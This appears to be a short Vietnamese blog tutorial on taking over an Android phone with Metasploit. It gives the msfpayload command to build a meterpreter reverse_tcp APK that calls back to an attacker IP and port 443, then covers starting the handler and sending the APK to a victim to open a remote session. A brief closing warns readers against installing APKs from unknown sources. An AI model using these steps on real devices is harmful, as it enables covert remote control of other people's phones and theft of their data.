Hacking Android smartphone sử dụng Metasploit

Ngày nay, số lượng thiết bị mobile được sử dụng ngày một nhiều trong cuộc sống, kéo theo đó là mối hiểm họa bảo mật cũng tăng theo. Trong bài viết này, mình sẽ hướng dẫn các bạn cách hack android smartphone sử dụng metasploit.

Dưới đây là một vài thông tin cho bài hướng dẫn này:

Attacker IP address: 192.168.8.94

Attacker port to reveive connection: 443

Yêu cầu:
+ Metasploit Framework
+ Android smartphone (HTC One android 4.4 KitKat)

Các bước thực hiện:

1. Mở terminal và tạo một khai thác:

msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=

Như đã được diễn giải ở trên, attacker IP address là 192.168.8.94, bạn sẽ nhập lệnh như hình dưới đây:

2. Payload được sử dungj ở đây là reverse_tcp, nó cho phép kết nối từ victim trở lại máy của attacker. Bây giờ trên máy attacker, bạn cần sử dụng module handler. Nhập msfconsole trong terminal

3. Sau khi đã thiết lập xong, bạn cần nhập exploit

4. Bây giờ, bạn gửi file APK đã tạo được ở bước 1 và gửi cho nạn nhân. Khi nạn nhân click vào file APK bạn sẽ nhận được một kết nối từ victim

Kết luận:

1. Không được cài file APK từ một nguồn không rõ ràng
2. Nếu bạn đã cài file APK từ một nguồn không rõ ràng, hãy chắc chắn rằng bạn có thể xem, đọc và kiểm tra mã nguồn. Hình dưới đây là mã nguồn của file APK độc hại trong hướng dẫn này.